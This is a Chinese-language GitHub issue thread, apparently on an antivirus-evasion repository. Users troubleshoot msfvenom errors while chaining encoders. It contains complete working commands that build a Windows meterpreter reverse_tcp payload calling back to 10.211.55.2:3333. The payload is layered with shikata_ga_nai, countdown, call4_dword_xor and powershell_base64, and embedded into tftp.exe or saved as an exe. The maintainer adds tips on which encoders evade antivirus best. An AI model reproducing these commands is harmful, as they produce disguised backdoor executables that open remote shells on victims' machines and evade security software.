Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

关于msf多重编码报错 #5

Closed
JsHuang opened this issue Feb 27, 2020 · 7 comments
Closed

关于msf多重编码报错 #5

JsHuang opened this issue Feb 27, 2020 · 7 comments

Comments

@JsHuang
Copy link

JsHuang commented Feb 27, 2020

文章 msf 自免杀中的多重编码方式,在Kali中使用报错

Attempting to read payload from STDIN...
Attempting to read payload from STDIN...
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai succeeded with size 395 (iteration=1)
x86/shikata_ga_nai succeeded with size 422 (iteration=2)
x86/shikata_ga_nai succeeded with size 449 (iteration=3)
x86/shikata_ga_nai succeeded with size 476 (iteration=4)
x86/shikata_ga_nai succeeded with size 503 (iteration=5)
x86/shikata_ga_nai succeeded with size 530 (iteration=6)
x86/shikata_ga_nai succeeded with size 557 (iteration=7)
x86/shikata_ga_nai succeeded with size 584 (iteration=8)
x86/shikata_ga_nai succeeded with size 611 (iteration=9)
x86/shikata_ga_nai succeeded with size 638 (iteration=10)
x86/shikata_ga_nai succeeded with size 665 (iteration=11)
x86/shikata_ga_nai succeeded with size 692 (iteration=12)
x86/shikata_ga_nai succeeded with size 719 (iteration=13)
x86/shikata_ga_nai succeeded with size 746 (iteration=14)
x86/shikata_ga_nai succeeded with size 773 (iteration=15)
x86/shikata_ga_nai succeeded with size 800 (iteration=16)
x86/shikata_ga_nai succeeded with size 827 (iteration=17)
x86/shikata_ga_nai succeeded with size 854 (iteration=18)
x86/shikata_ga_nai succeeded with size 881 (iteration=19)
x86/shikata_ga_nai chosen with final size 881
Payload size: 881 bytes

Error: You must select an arch for a custom payload
Error: You must select an arch for a custom payload
@TideSec
Copy link
Owner

TideSec commented Feb 28, 2020

看错误信息应该是没指定64位还是32位系统,可以加参数-a x86 --platform windows试一下。如果还是不行,请提供完整命令和错误信息截图。

@JsHuang
Copy link
Author

JsHuang commented Feb 29, 2020

看错误信息应该是没指定64位还是32位系统,可以加参数-a x86 --platform windows试一下。如果还是不行,请提供完整命令和错误信息截图。

添加了之后的全命令和错误信息如下:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=10.211.55.2 LPORT=3333 -f raw | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -x tftp.exe -f exe -o payload5.exe
Attempting to read payload from STDIN...
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai succeeded with size 395 (iteration=1)
x86/shikata_ga_nai succeeded with size 422 (iteration=2)
x86/shikata_ga_nai succeeded with size 449 (iteration=3)
x86/shikata_ga_nai succeeded with size 476 (iteration=4)
x86/shikata_ga_nai succeeded with size 503 (iteration=5)
x86/shikata_ga_nai succeeded with size 530 (iteration=6)
x86/shikata_ga_nai succeeded with size 557 (iteration=7)
x86/shikata_ga_nai succeeded with size 584 (iteration=8)
x86/shikata_ga_nai succeeded with size 611 (iteration=9)
x86/shikata_ga_nai succeeded with size 638 (iteration=10)
x86/shikata_ga_nai succeeded with size 665 (iteration=11)
x86/shikata_ga_nai succeeded with size 692 (iteration=12)
x86/shikata_ga_nai succeeded with size 719 (iteration=13)
x86/shikata_ga_nai succeeded with size 746 (iteration=14)
x86/shikata_ga_nai succeeded with size 773 (iteration=15)
x86/shikata_ga_nai succeeded with size 800 (iteration=16)
x86/shikata_ga_nai succeeded with size 827 (iteration=17)
x86/shikata_ga_nai succeeded with size 854 (iteration=18)
x86/shikata_ga_nai succeeded with size 881 (iteration=19)
x86/shikata_ga_nai chosen with final size 881
Payload size: 881 bytes

Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/alpha_upper
x86/alpha_upper succeeded with size 1831 (iteration=0)
x86/alpha_upper succeeded with size 3731 (iteration=1)
x86/alpha_upper succeeded with size 7531 (iteration=2)
x86/alpha_upper succeeded with size 15131 (iteration=3)
x86/alpha_upper succeeded with size 30330 (iteration=4)
x86/alpha_upper succeeded with size 60729 (iteration=5)
x86/alpha_upper succeeded with size 121526 (iteration=6)
x86/alpha_upper succeeded with size 243121 (iteration=7)
x86/alpha_upper succeeded with size 486311 (iteration=8)
x86/alpha_upper succeeded with size 972690 (iteration=9)
x86/alpha_upper chosen with final size 972690
Payload size: 972690 bytes
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/countdown
x86/countdown succeeded with size 16 (iteration=0)
x86/countdown succeeded with size 32 (iteration=1)
x86/countdown succeeded with size 48 (iteration=2)
x86/countdown succeeded with size 64 (iteration=3)
x86/countdown succeeded with size 80 (iteration=4)
x86/countdown succeeded with size 96 (iteration=5)
x86/countdown succeeded with size 112 (iteration=6)
x86/countdown succeeded with size 128 (iteration=7)
x86/countdown succeeded with size 144 (iteration=8)
x86/countdown succeeded with size 161 (iteration=9)
x86/countdown chosen with final size 161
Payload size: 161 bytes
Final size of exe file: 26112 bytes
Saved as: payload5.exe
Traceback (most recent call last):
        1: from /usr/bin/msfvenom:477:in `<main>'
/usr/bin/msfvenom:477:in `write': Broken pipe @ io_write - <STDOUT> (Errno::EPIPE)

@TideSec
Copy link
Owner

TideSec commented Mar 1, 2020

看错误信息应该是没指定64位还是32位系统,可以加参数-a x86 --platform windows试一下。如果还是不行,请提供完整命令和错误信息截图。

添加了之后的全命令和错误信息如下:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=10.211.55.2 LPORT=3333 -f raw | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -x tftp.exe -f exe -o payload5.exe
Attempting to read payload from STDIN...
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai succeeded with size 395 (iteration=1)
x86/shikata_ga_nai succeeded with size 422 (iteration=2)
x86/shikata_ga_nai succeeded with size 449 (iteration=3)
x86/shikata_ga_nai succeeded with size 476 (iteration=4)
x86/shikata_ga_nai succeeded with size 503 (iteration=5)
x86/shikata_ga_nai succeeded with size 530 (iteration=6)
x86/shikata_ga_nai succeeded with size 557 (iteration=7)
x86/shikata_ga_nai succeeded with size 584 (iteration=8)
x86/shikata_ga_nai succeeded with size 611 (iteration=9)
x86/shikata_ga_nai succeeded with size 638 (iteration=10)
x86/shikata_ga_nai succeeded with size 665 (iteration=11)
x86/shikata_ga_nai succeeded with size 692 (iteration=12)
x86/shikata_ga_nai succeeded with size 719 (iteration=13)
x86/shikata_ga_nai succeeded with size 746 (iteration=14)
x86/shikata_ga_nai succeeded with size 773 (iteration=15)
x86/shikata_ga_nai succeeded with size 800 (iteration=16)
x86/shikata_ga_nai succeeded with size 827 (iteration=17)
x86/shikata_ga_nai succeeded with size 854 (iteration=18)
x86/shikata_ga_nai succeeded with size 881 (iteration=19)
x86/shikata_ga_nai chosen with final size 881
Payload size: 881 bytes

Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/alpha_upper
x86/alpha_upper succeeded with size 1831 (iteration=0)
x86/alpha_upper succeeded with size 3731 (iteration=1)
x86/alpha_upper succeeded with size 7531 (iteration=2)
x86/alpha_upper succeeded with size 15131 (iteration=3)
x86/alpha_upper succeeded with size 30330 (iteration=4)
x86/alpha_upper succeeded with size 60729 (iteration=5)
x86/alpha_upper succeeded with size 121526 (iteration=6)
x86/alpha_upper succeeded with size 243121 (iteration=7)
x86/alpha_upper succeeded with size 486311 (iteration=8)
x86/alpha_upper succeeded with size 972690 (iteration=9)
x86/alpha_upper chosen with final size 972690
Payload size: 972690 bytes
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/countdown
x86/countdown succeeded with size 16 (iteration=0)
x86/countdown succeeded with size 32 (iteration=1)
x86/countdown succeeded with size 48 (iteration=2)
x86/countdown succeeded with size 64 (iteration=3)
x86/countdown succeeded with size 80 (iteration=4)
x86/countdown succeeded with size 96 (iteration=5)
x86/countdown succeeded with size 112 (iteration=6)
x86/countdown succeeded with size 128 (iteration=7)
x86/countdown succeeded with size 144 (iteration=8)
x86/countdown succeeded with size 161 (iteration=9)
x86/countdown chosen with final size 161
Payload size: 161 bytes
Final size of exe file: 26112 bytes
Saved as: payload5.exe
Traceback (most recent call last):
        1: from /usr/bin/msfvenom:477:in `<main>'
/usr/bin/msfvenom:477:in `write': Broken pipe @ io_write - <STDOUT> (Errno::EPIPE)

这个其实已经生成了exe文件了,你这个报错主要是因为使用了alpha_upper编码,这个编码在Msfvenom的编码列表里属于low的那种(使用msfvenom --list encoders可查看有编码,low的共有6个),用这个编码效果可能一般,而且我试了下和其他编码在一起的时候很容易报错。
比如我用下面这个就可以正常生成payload:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=10.211.55.2 LPORT=3333 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&" -i 4 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -k -f exe > payload8.exe

但是把里面任意一个编码器换成x86/alpha_upper那么都会报你上面的错。

另外,编码器不建议使用太多,使用越多,带入的能被杀软识别的特征字符可能会越多,免杀效果会变差,另外就是编码太多可能会导致生成的payload没法正常运行了。

@JsHuang
Copy link
Author

JsHuang commented Mar 2, 2020

谢谢!!! @TideSec

@JsHuang JsHuang closed this as completed Mar 2, 2020
@Zhusihai
Copy link

卡里中报错Error: No .text section found in the template
求解!

@RichardKabuto
Copy link

卡里报错Error: No text section found in the template .

这个怎么解决了,我目前也遇到了

@l140w4n9
Copy link

“msfvenom”有一个有趣的附加命令行标志,用于将格式更改为“exe-only”而不是“exe”。对于 64 位二进制文​​件,此标志具有创建新节标题或修改现有“.text”节的效果。在 32 位二进制文​​件的情况下,shellcode 最终在“.text”部分,然而,特征标志不同,并且在“exe-only”版本中引入了一些额外的汇编代码。

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
5 participants
@JsHuang @l140w4n9 @TideSec @RichardKabuto @Zhusihai